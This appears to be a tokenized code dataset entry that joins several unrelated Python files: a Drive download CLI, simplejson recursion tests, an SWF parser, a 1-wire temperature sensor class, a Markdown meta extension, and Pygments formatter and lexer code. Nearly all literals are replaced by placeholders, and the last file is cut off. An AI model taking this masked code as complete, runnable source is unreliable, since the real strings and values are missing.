metavar = '<STR_LIT>' , <EOL> default = '<STR_LIT>' , <EOL> required = False , <EOL> help = '<STR_LIT>' % <EOL> help_export_format ) <EOL> arg_parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> arg_parser . add_argument ( '<STR_LIT>' , <EOL> choices = DEBUG_LEVEL , <EOL> default = DEBUG_LEVEL [ - <NUM_LIT:1> ] , <EOL> help = '<STR_LIT>' ) <EOL> args = arg_parser . parse_args ( ) <EOL> logger . setLevel ( getattr ( logging , args . debug . upper ( ) ) ) <EOL> logger . debug ( args ) <EOL> get = GDGet ( args . file_id , args . export_format , args . save_as ) <EOL> result = get . run ( ) <EOL> sys . exit ( <NUM_LIT:0> ) </s>
<s> from unittest import TestCase <EOL> import simplejson as S <EOL> class JSONTestObject : <EOL> pass <EOL> class RecursiveJSONEncoder ( S . JSONEncoder ) : <EOL> recurse = False <EOL> def default ( self , o ) : <EOL> if o is JSONTestObject : <EOL> if self . recurse : <EOL> return [ JSONTestObject ] <EOL> else : <EOL> return '<STR_LIT>' <EOL> return S . JSONEncoder . default ( o ) <EOL> class TestRecursion ( TestCase ) : <EOL> def test_listrecursion ( self ) : <EOL> x = [ ] <EOL> x . append ( x ) <EOL> try : <EOL> S . dumps ( x ) <EOL> except ValueError : <EOL> pass <EOL> else : <EOL> self . fail ( "<STR_LIT>" ) <EOL> x = [ ] <EOL> y = [ x ] <EOL> x . append ( y ) <EOL> try : <EOL> S . dumps ( x ) <EOL> except ValueError : <EOL> pass <EOL> else : <EOL> self . fail ( "<STR_LIT>" ) <EOL> y = [ ] <EOL> x = [ y , y ] <EOL> S . dumps ( x ) <EOL> def test_dictrecursion ( self ) : <EOL> x = { } <EOL> x [ "<STR_LIT:test>" ] = x <EOL> try : <EOL> S . dumps ( x ) <EOL> except ValueError : <EOL> pass <EOL> else : <EOL> self . fail ( "<STR_LIT>" ) <EOL> x = { } <EOL> y = { "<STR_LIT:a>" : x , "<STR_LIT:b>" : x } <EOL> S . dumps ( x ) <EOL> def test_defaultrecursion ( self ) : <EOL> enc = RecursiveJSONEncoder ( ) <EOL> self . assertEquals ( enc . encode ( JSONTestObject ) , '<STR_LIT>' ) <EOL> enc . recurse = True <EOL> try : <EOL> enc . encode ( JSONTestObject ) <EOL> except ValueError : <EOL> pass <EOL> else : <EOL> self . fail ( "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> from . tag import SWFTimelineContainer <EOL> from . stream import SWFStream <EOL> from . export import SVGExporter <EOL> from six . moves import cStringIO <EOL> from io import BytesIO <EOL> class SWFHeaderException ( Exception ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , message ) : <EOL> super ( SWFHeaderException , self ) . __init__ ( message ) <EOL> class SWFHeader ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , stream ) : <EOL> a = stream . readUI8 ( ) <EOL> b = stream . readUI8 ( ) <EOL> c = stream . readUI8 ( ) <EOL> if not a in [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] or b != <NUM_LIT> or c != <NUM_LIT> : <EOL> raise SWFHeaderException ( "<STR_LIT>" ) <EOL> self . _compressed_zlib = ( a == <NUM_LIT> ) <EOL> self . _compressed_lzma = ( a == <NUM_LIT> ) <EOL> self . _version = stream . readUI8 ( ) <EOL> self . _file_length = stream . readUI32 ( ) <EOL> if not ( self . _compressed_zlib or self . _compressed_lzma ) : <EOL> self . _frame_size = stream . readRECT ( ) <EOL> self . _frame_rate = stream . readFIXED8 ( ) <EOL> self . _frame_count = stream . readUI16 ( ) <EOL> @ property <EOL> def frame_size ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _frame_size <EOL> @ property <EOL> def frame_rate ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _frame_rate <EOL> @ property <EOL> def frame_count ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _frame_count <EOL> @ property <EOL> def file_length ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _file_length <EOL> @ property <EOL> def version ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _version <EOL> @ property <EOL> def compressed ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _compressed_zlib or self . _compressed_lzma <EOL> @ property <EOL> def compressed_zlib ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _compressed_zlib <EOL> @ property <EOL> def compressed_lzma ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _compressed_lzma <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" + "<STR_LIT>" % self . version + "<STR_LIT>" % self . file_length + "<STR_LIT>" % self . frame_size . __str__ ( ) + "<STR_LIT>" % self . frame_rate + "<STR_LIT>" % self . frame_count <EOL> class SWF ( SWFTimelineContainer ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , file = None ) : <EOL> super ( SWF , self ) . __init__ ( ) <EOL> self . _data = None if file is None else SWFStream ( file ) <EOL> self . _header = None <EOL> if self . _data is not None : <EOL> self . parse ( self . _data ) <EOL> @ property <EOL> def data ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _data <EOL> @ property <EOL> def header ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _header <EOL> def export ( self , exporter = None , force_stroke = False ) : <EOL> """<STR_LIT>""" <EOL> exporter = SVGExporter ( ) if exporter is None else exporter <EOL> if self . _data is None : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> if len ( self . tags ) == <NUM_LIT:0> : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> return exporter . export ( self , force_stroke ) <EOL> def parse_file ( self , filename ) : <EOL> """<STR_LIT>""" <EOL> self . parse ( open ( filename , '<STR_LIT:rb>' ) ) <EOL> def parse ( self , data ) : <EOL> """<STR_LIT>""" <EOL> self . _data = data = data if isinstance ( data , SWFStream ) else SWFStream ( data ) <EOL> self . _header = SWFHeader ( self . _data ) <EOL> if self . _header . compressed : <EOL> temp = BytesIO ( ) <EOL> if self . _header . compressed_zlib : <EOL> import zlib <EOL> data = data . f . read ( ) <EOL> zip = zlib . decompressobj ( ) <EOL> temp . write ( zip . decompress ( data ) ) <EOL> else : <EOL> import pylzma <EOL> data . readUI32 ( ) <EOL> data = data . f . read ( ) <EOL> temp . write ( pylzma . decompress ( data ) ) <EOL> temp . seek ( <NUM_LIT:0> ) <EOL> data = SWFStream ( temp ) <EOL> self . _header . _frame_size = data . readRECT ( ) <EOL> self . _header . _frame_rate = data . readFIXED8 ( ) <EOL> self . _header . _frame_count = data . readUI16 ( ) <EOL> self . parse_tags ( data ) <EOL> def __str__ ( self ) : <EOL> s = "<STR_LIT>" <EOL> s += self . _header . __str__ ( ) <EOL> for tag in self . tags : <EOL> s += tag . __str__ ( ) + "<STR_LIT:\n>" <EOL> return s </s>
<s> """<STR_LIT>""" <EOL> from os import path , listdir , system <EOL> from time import sleep <EOL> class W1ThermSensorError ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class KernelModuleLoadError ( W1ThermSensorError ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> super ( KernelModuleLoadError , self ) . __init__ ( "<STR_LIT>" ) <EOL> class NoSensorFoundError ( W1ThermSensorError ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , sensor_type , sensor_id ) : <EOL> super ( NoSensorFoundError , self ) . __init__ ( <EOL> "<STR_LIT>" . format ( <EOL> W1ThermSensor . TYPE_NAMES . get ( sensor_type , "<STR_LIT>" ) , sensor_id ) ) <EOL> class SensorNotReadyError ( W1ThermSensorError ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> super ( SensorNotReadyError , self ) . __init__ ( "<STR_LIT>" ) <EOL> class UnsupportedUnitError ( W1ThermSensorError ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> super ( UnsupportedUnitError , self ) . __init__ ( "<STR_LIT>" ) <EOL> class W1ThermSensor ( object ) : <EOL> """<STR_LIT>""" <EOL> THERM_SENSOR_DS18S20 = <NUM_LIT> <EOL> THERM_SENSOR_DS1822 = <NUM_LIT> <EOL> THERM_SENSOR_DS18B20 = <NUM_LIT> <EOL> THERM_SENSOR_DS1825 = <NUM_LIT> <EOL> THERM_SENSOR_DS28EA00 = <NUM_LIT> <EOL> THERM_SENSOR_MAX31850K = <NUM_LIT> <EOL> ALL_TYPES = [ <EOL> THERM_SENSOR_DS18S20 , THERM_SENSOR_DS1822 , THERM_SENSOR_DS18B20 , <EOL> THERM_SENSOR_DS1825 , THERM_SENSOR_DS28EA00 , THERM_SENSOR_MAX31850K <EOL> ] <EOL> DEGREES_C = <NUM_LIT> <EOL> DEGREES_F = <NUM_LIT> <EOL> KELVIN = <NUM_LIT> <EOL> BASE_DIRECTORY = "<STR_LIT>" <EOL> SLAVE_FILE = "<STR_LIT>" <EOL> UNIT_FACTORS = { <EOL> DEGREES_C : lambda x : x * <NUM_LIT> , <EOL> DEGREES_F : lambda x : x * <NUM_LIT> * <NUM_LIT> + <NUM_LIT> , <EOL> KELVIN : lambda x : x * <NUM_LIT> + <NUM_LIT> <EOL> } <EOL> UNIT_FACTOR_NAMES = { <EOL> "<STR_LIT>" : DEGREES_C , <EOL> "<STR_LIT>" : DEGREES_F , <EOL> "<STR_LIT>" : KELVIN <EOL> } <EOL> TYPE_NAMES = { <EOL> THERM_SENSOR_DS18S20 : "<STR_LIT>" , THERM_SENSOR_DS1822 : "<STR_LIT>" , THERM_SENSOR_DS18B20 : "<STR_LIT>" , <EOL> THERM_SENSOR_DS1825 : "<STR_LIT>" , THERM_SENSOR_DS28EA00 : "<STR_LIT>" , THERM_SENSOR_MAX31850K : "<STR_LIT>" <EOL> } <EOL> RESOLVE_TYPE_STR = { <EOL> "<STR_LIT>" : THERM_SENSOR_DS18S20 , "<STR_LIT>" : THERM_SENSOR_DS1822 , "<STR_LIT>" : THERM_SENSOR_DS18B20 , <EOL> "<STR_LIT>" : THERM_SENSOR_DS28EA00 , "<STR_LIT>" : THERM_SENSOR_MAX31850K <EOL> } <EOL> RETRY_ATTEMPTS = <NUM_LIT:10> <EOL> RETRY_DELAY_SECONDS = <NUM_LIT:1.0> / float ( RETRY_ATTEMPTS ) <EOL> @ classmethod <EOL> def get_available_sensors ( cls , types = None ) : <EOL> """<STR_LIT>""" <EOL> if not types : <EOL> types = cls . ALL_TYPES <EOL> is_sensor = lambda s : any ( s . startswith ( hex ( x ) [ <NUM_LIT:2> : ] ) for x in types ) <EOL> return [ cls ( cls . RESOLVE_TYPE_STR [ s [ : <NUM_LIT:2> ] ] , s [ <NUM_LIT:3> : ] ) for s in listdir ( cls . BASE_DIRECTORY ) if is_sensor ( s ) ] <EOL> def __init__ ( self , sensor_type = None , sensor_id = None ) : <EOL> """<STR_LIT>""" <EOL> self . _load_kernel_modules ( ) <EOL> self . type = sensor_type <EOL> self . id = sensor_id <EOL> if not sensor_type and not sensor_id : <EOL> for _ in range ( self . RETRY_ATTEMPTS ) : <EOL> s = self . get_available_sensors ( ) <EOL> if s : <EOL> self . type , self . id = s [ <NUM_LIT:0> ] . type , s [ <NUM_LIT:0> ] . id <EOL> break <EOL> sleep ( self . RETRY_DELAY_SECONDS ) <EOL> else : <EOL> raise NoSensorFoundError ( None , "<STR_LIT>" ) <EOL> elif not sensor_id : <EOL> s = self . get_available_sensors ( [ sensor_type ] ) <EOL> if not s : <EOL> raise NoSensorFoundError ( sensor_type , "<STR_LIT>" ) <EOL> self . id = s [ <NUM_LIT:0> ] . id <EOL> self . sensorpath = path . join ( self . BASE_DIRECTORY , self . slave_prefix + self . id , self . SLAVE_FILE ) <EOL> if not self . exists ( ) : <EOL> raise NoSensorFoundError ( self . type , self . id ) <EOL> def _load_kernel_modules ( self ) : <EOL> """<STR_LIT>""" <EOL> if not path . isdir ( self . BASE_DIRECTORY ) : <EOL> system ( "<STR_LIT>" ) <EOL> system ( "<STR_LIT>" ) <EOL> for _ in range ( self . RETRY_ATTEMPTS ) : <EOL> if path . isdir ( self . BASE_DIRECTORY ) : <EOL> break <EOL> sleep ( self . RETRY_DELAY_SECONDS ) <EOL> else : <EOL> raise KernelModuleLoadError ( ) <EOL> def __repr__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return "<STR_LIT>" . format ( <EOL> self . __class__ . __name__ , self . type , self . id ) <EOL> def __str__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return "<STR_LIT>" . format ( <EOL> self . __class__ . __name__ , self . type_name , self . type , self . id ) <EOL> @ property <EOL> def type_name ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . TYPE_NAMES . get ( self . type , "<STR_LIT>" ) <EOL> @ property <EOL> def slave_prefix ( self ) : <EOL> """<STR_LIT>""" <EOL> return "<STR_LIT>" % hex ( self . type ) [ <NUM_LIT:2> : ] <EOL> def exists ( self ) : <EOL> """<STR_LIT>""" <EOL> return path . exists ( self . sensorpath ) <EOL> @ property <EOL> def raw_sensor_value ( self ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> with open ( self . sensorpath , "<STR_LIT:r>" ) as f : <EOL> data = f . readlines ( ) <EOL> except IOError : <EOL> raise NoSensorFoundError ( self . type , self . id ) <EOL> if data [ <NUM_LIT:0> ] . strip ( ) [ - <NUM_LIT:3> : ] != "<STR_LIT>" : <EOL> raise SensorNotReadyError ( ) <EOL> return float ( data [ <NUM_LIT:1> ] . split ( "<STR_LIT:=>" ) [ <NUM_LIT:1> ] ) <EOL> @ classmethod <EOL> def _get_unit_factor ( cls , unit ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> if isinstance ( unit , str ) : <EOL> unit = cls . UNIT_FACTOR_NAMES [ unit ] <EOL> return cls . UNIT_FACTORS [ unit ] <EOL> except KeyError : <EOL> raise UnsupportedUnitError ( ) <EOL> def get_temperature ( self , unit = DEGREES_C ) : <EOL> """<STR_LIT>""" <EOL> factor = self . _get_unit_factor ( unit ) <EOL> return factor ( self . raw_sensor_value ) <EOL> def get_temperatures ( self , units ) : <EOL> """<STR_LIT>""" <EOL> sensor_value = self . raw_sensor_value <EOL> return [ self . _get_unit_factor ( unit ) ( sensor_value ) for unit in units ] </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> from __future__ import unicode_literals <EOL> from . import Extension <EOL> from . . preprocessors import Preprocessor <EOL> import re <EOL> META_RE = re . compile ( r'<STR_LIT>' ) <EOL> META_MORE_RE = re . compile ( r'<STR_LIT>' ) <EOL> class MetaExtension ( Extension ) : <EOL> """<STR_LIT>""" <EOL> def extendMarkdown ( self , md , md_globals ) : <EOL> """<STR_LIT>""" <EOL> md . preprocessors . add ( "<STR_LIT>" , MetaPreprocessor ( md ) , "<STR_LIT>" ) <EOL> class MetaPreprocessor ( Preprocessor ) : <EOL> """<STR_LIT>""" <EOL> def run ( self , lines ) : <EOL> """<STR_LIT>""" <EOL> meta = { } <EOL> key = None <EOL> while lines : <EOL> line = lines . pop ( <NUM_LIT:0> ) <EOL> if line . strip ( ) == '<STR_LIT>' : <EOL> break <EOL> m1 = META_RE . match ( line ) <EOL> if m1 : <EOL> key = m1 . group ( '<STR_LIT:key>' ) . lower ( ) . strip ( ) <EOL> value = m1 . group ( '<STR_LIT:value>' ) . strip ( ) <EOL> try : <EOL> meta [ key ] . append ( value ) <EOL> except KeyError : <EOL> meta [ key ] = [ value ] <EOL> else : <EOL> m2 = META_MORE_RE . match ( line ) <EOL> if m2 and key : <EOL> meta [ key ] . append ( m2 . group ( '<STR_LIT:value>' ) . strip ( ) ) <EOL> else : <EOL> lines . insert ( <NUM_LIT:0> , line ) <EOL> break <EOL> self . markdown . Meta = meta <EOL> return lines <EOL> def makeExtension ( configs = { } ) : <EOL> return MetaExtension ( configs = configs ) </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> from pygments . formatter import Formatter <EOL> __all__ = [ '<STR_LIT>' ] <EOL> class EscapeSequence : <EOL> def __init__ ( self , fg = None , bg = None , bold = False , underline = False ) : <EOL> self . fg = fg <EOL> self . bg = bg <EOL> self . bold = bold <EOL> self . underline = underline <EOL> def escape ( self , attrs ) : <EOL> if len ( attrs ) : <EOL> return "<STR_LIT>" + "<STR_LIT:;>" . join ( attrs ) + "<STR_LIT:m>" <EOL> return "<STR_LIT>" <EOL> def color_string ( self ) : <EOL> attrs = [ ] <EOL> if self . fg is not None : <EOL> attrs . extend ( ( "<STR_LIT>" , "<STR_LIT:5>" , "<STR_LIT>" % self . fg ) ) <EOL> if self . bg is not None : <EOL> attrs . extend ( ( "<STR_LIT>" , "<STR_LIT:5>" , "<STR_LIT>" % self . bg ) ) <EOL> if self . bold : <EOL> attrs . append ( "<STR_LIT>" ) <EOL> if self . underline : <EOL> attrs . append ( "<STR_LIT>" ) <EOL> return self . escape ( attrs ) <EOL> def reset_string ( self ) : <EOL> attrs = [ ] <EOL> if self . fg is not None : <EOL> attrs . append ( "<STR_LIT>" ) <EOL> if self . bg is not None : <EOL> attrs . append ( "<STR_LIT>" ) <EOL> if self . bold or self . underline : <EOL> attrs . append ( "<STR_LIT>" ) <EOL> return self . escape ( attrs ) <EOL> class Terminal256Formatter ( Formatter ) : <EOL> r"""<STR_LIT>""" <EOL> name = '<STR_LIT>' <EOL> aliases = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> filenames = [ ] <EOL> def __init__ ( self , ** options ) : <EOL> Formatter . __init__ ( self , ** options ) <EOL> self . xterm_colors = [ ] <EOL> self . best_match = { } <EOL> self . style_string = { } <EOL> self . usebold = '<STR_LIT>' not in options <EOL> self . useunderline = '<STR_LIT>' not in options <EOL> self . _build_color_table ( ) <EOL> self . _setup_styles ( ) <EOL> def _build_color_table ( self ) : <EOL> self . xterm_colors . append ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> self . xterm_colors . append ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> self . xterm_colors . append ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> self . xterm_colors . append ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> self . xterm_colors . append ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> self . xterm_colors . append ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> self . xterm_colors . append ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> self . xterm_colors . append ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> self . xterm_colors . append ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> self . xterm_colors . append ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> self . xterm_colors . append ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> self . xterm_colors . append ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> self . xterm_colors . append ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> self . xterm_colors . append ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> self . xterm_colors . append ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> self . xterm_colors . append ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> valuerange = ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> for i in range ( <NUM_LIT> ) : <EOL> r = valuerange [ ( i // <NUM_LIT> ) % <NUM_LIT:6> ] <EOL> g = valuerange [ ( i // <NUM_LIT:6> ) % <NUM_LIT:6> ] <EOL> b = valuerange [ i % <NUM_LIT:6> ] <EOL> self . xterm_colors . append ( ( r , g , b ) ) <EOL> for i in range ( <NUM_LIT:1> , <NUM_LIT> ) : <EOL> v = <NUM_LIT:8> + i * <NUM_LIT:10> <EOL> self . xterm_colors . append ( ( v , v , v ) ) <EOL> def _closest_color ( self , r , g , b ) : <EOL> distance = <NUM_LIT> * <NUM_LIT> * <NUM_LIT:3> <EOL> match = <NUM_LIT:0> <EOL> for i in range ( <NUM_LIT:0> , <NUM_LIT> ) : <EOL> values = self . xterm_colors [ i ] <EOL> rd = r - values [ <NUM_LIT:0> ] <EOL> gd = g - values [ <NUM_LIT:1> ] <EOL> bd = b - values [ <NUM_LIT:2> ] <EOL> d = rd * rd + gd * gd + bd * bd <EOL> if d < distance : <EOL> match = i <EOL> distance = d <EOL> return match <EOL> def _color_index ( self , color ) : <EOL> index = self . best_match . get ( color , None ) <EOL> if index is None : <EOL> try : <EOL> rgb = int ( str ( color ) , <NUM_LIT:16> ) <EOL> except ValueError : <EOL> rgb = <NUM_LIT:0> <EOL> r = ( rgb >> <NUM_LIT:16> ) & <NUM_LIT> <EOL> g = ( rgb >> <NUM_LIT:8> ) & <NUM_LIT> <EOL> b = rgb & <NUM_LIT> <EOL> index = self . _closest_color ( r , g , b ) <EOL> self . best_match [ color ] = index <EOL> return index <EOL> def _setup_styles ( self ) : <EOL> for ttype , ndef in self . style : <EOL> escape = EscapeSequence ( ) <EOL> if ndef [ '<STR_LIT>' ] : <EOL> escape . fg = self . _color_index ( ndef [ '<STR_LIT>' ] ) <EOL> if ndef [ '<STR_LIT>' ] : <EOL> escape . bg = self . _color_index ( ndef [ '<STR_LIT>' ] ) <EOL> if self . usebold and ndef [ '<STR_LIT>' ] : <EOL> escape . bold = True <EOL> if self . useunderline and ndef [ '<STR_LIT>' ] : <EOL> escape . underline = True <EOL> self . style_string [ str ( ttype ) ] = ( escape . color_string ( ) , <EOL> escape . reset_string ( ) ) <EOL> def format ( self , tokensource , outfile ) : <EOL> if not self . encoding and hasattr ( outfile , "<STR_LIT>" ) and hasattr ( outfile , "<STR_LIT>" ) and outfile . isatty ( ) and sys . version_info < ( <NUM_LIT:3> , ) : <EOL> self . encoding = outfile . encoding <EOL> return Formatter . format ( self , tokensource , outfile ) <EOL> def format_unencoded ( self , tokensource , outfile ) : <EOL> for ttype , value in tokensource : <EOL> not_found = True <EOL> while ttype and not_found : <EOL> try : <EOL> on , off = self . style_string [ str ( ttype ) ] <EOL> spl = value . split ( '<STR_LIT:\n>' ) <EOL> for line in spl [ : - <NUM_LIT:1> ] : <EOL> if line : <EOL> outfile . write ( on + line + off ) <EOL> outfile . write ( '<STR_LIT:\n>' ) <EOL> if spl [ - <NUM_LIT:1> ] : <EOL> outfile . write ( on + spl [ - <NUM_LIT:1> ] + off ) <EOL> not_found = False <EOL> except KeyError : <EOL> ttype = ttype [ : - <NUM_LIT:1> ] <EOL> if not_found : <EOL> outfile . write ( value ) </s>
<s> """<STR_LIT>""" <EOL> from pygments . lexer import RegexLexer , bygroups , words <EOL> from pygments . token import Text , Comment , Operator , Keyword , Name , String , Number , Punctuation <EOL> __all__ = [ '<STR_LIT>' ] <EOL> class ChapelLexer ( RegexLexer ) : <EOL> """<STR_LIT>""" <EOL> name = '<STR_LIT>' <EOL> filenames = [ '<STR_LIT>' ] <EOL> aliases = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> tokens = { <EOL> '<STR_LIT:root>' : [ <EOL> ( r'<STR_LIT:\n>' , Text ) , <EOL> ( r'<STR_LIT>' , Text ) , <EOL> ( r'<STR_LIT>' , Text ) , <EOL> ( r'<STR_LIT>' , Comment . Single ) , <EOL> ( r'<STR_LIT>' , Comment . Multiline ) , <EOL> ( r'<STR_LIT>' , <EOL> Keyword . Declaration ) , <EOL> ( r'<STR_LIT>' , Keyword . Constant ) , <EOL> ( r'<STR_LIT>' , <EOL> Keyword . Type ) , <EOL> ( words ( ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:index>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT:label>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , suffix = r'<STR_LIT>' ) , <EOL> Keyword ) , <EOL> ( r'<STR_LIT>' , bygroups ( Keyword , Text ) , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , bygroups ( Keyword , Text ) , <EOL> '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , Number ) , <EOL> ( r'<STR_LIT>' , Number ) , <EOL> ( r'<STR_LIT>' , Number ) , <EOL> ( r'<STR_LIT>' , Number ) , <EOL> ( r'<STR_LIT>' , Number . Float ) , <EOL> ( r'<STR_LIT>' , Number . Float ) , <EOL> ( r'<STR_LIT>' , Number . Bin ) , <EOL> ( r'<STR_LIT>' , Number . Hex ) , <EOL> ( r'<STR_LIT>' , Number . Oct ) , <EOL> ( r'<STR_LIT>' , Number . Integer ) , <EOL> ( r'<STR_LIT>' , String ) , <EOL> ( r'<STR_LIT>' <EOL> r'<STR_LIT>' <EOL> r'<STR_LIT>' <EOL> r'<STR_LIT>' <EOL> r'<STR_LIT>' , Operator ) , <EOL> ( r'<STR_LIT>' , Punctuation ) , <EOL> ( r'<STR_LIT>' , Name . Other ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( r'<STR_LIT>' , Name . Class , '<STR_LIT:#pop>' ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( r'<STR_LIT>' , Name . Function , '<STR_LIT:#pop>' ) , <EOL> ] , <EOL> } </s>
<s> """<STR_LIT>""" <EOL> import re <EOL> from pygments . lexer import RegexLexer , ExtendedRegexLexer , include , bygroups , default , using <EOL> from pygments . token import Text , Comment , Operator , Keyword , Name , String , Punctuation <EOL> from pygments . util import looks_like_xml , html_doctype_matches <EOL> from pygments . lexers . javascript import JavascriptLexer <EOL> from pygments . lexers . jvm import ScalaLexer <EOL> from pygments . lexers . css import CssLexer , _indentation , _starts_block <EOL> from pygments . lexers . ruby import RubyLexer <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> class HtmlLexer ( RegexLexer ) : <EOL> """<STR_LIT>""" <EOL> name = '<STR_LIT>' <EOL> aliases = [ '<STR_LIT:html>' ] <EOL> filenames = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> mimetypes = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> flags = re . IGNORECASE | re . DOTALL <EOL> tokens = { <EOL> '<STR_LIT:root>' : [ <EOL> ( '<STR_LIT>' , Text ) , <EOL> ( r'<STR_LIT>' , Name . Entity ) , <EOL> ( r'<STR_LIT>' , Comment . Preproc ) , <EOL> ( '<STR_LIT>' , Comment , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , Comment . Preproc ) , <EOL> ( '<STR_LIT>' , Comment . Preproc ) , <EOL> ( r'<STR_LIT>' , Name . Tag , ( '<STR_LIT>' , '<STR_LIT>' ) ) , <EOL> ( r'<STR_LIT>' , Name . Tag , ( '<STR_LIT>' , '<STR_LIT>' ) ) , <EOL> ( r'<STR_LIT>' , Name . Tag , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , Name . Tag ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( '<STR_LIT>' , Comment ) , <EOL> ( '<STR_LIT>' , Comment , '<STR_LIT:#pop>' ) , <EOL> ( '<STR_LIT:->' , Comment ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( r'<STR_LIT>' , Text ) , <EOL> ( r'<STR_LIT>' , bygroups ( Name . Attribute , Text ) , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , Name . Attribute ) , <EOL> ( r'<STR_LIT>' , Name . Tag , '<STR_LIT:#pop>' ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( r'<STR_LIT>' , Name . Tag , '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT>' , using ( JavascriptLexer ) ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( r'<STR_LIT>' , Name . Tag , '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT>' , using ( CssLexer ) ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( '<STR_LIT>' , String , '<STR_LIT:#pop>' ) , <EOL> ( "<STR_LIT>" , String , '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT>' , String , '<STR_LIT:#pop>' ) , <EOL> ] , <EOL> } <EOL> def analyse_text ( text ) : <EOL> if html_doctype_matches ( text ) : <EOL> return <NUM_LIT:0.5> <EOL> class DtdLexer ( RegexLexer ) : <EOL> """<STR_LIT>""" <EOL> flags = re . MULTILINE | re . DOTALL <EOL> name = '<STR_LIT>' <EOL> aliases = 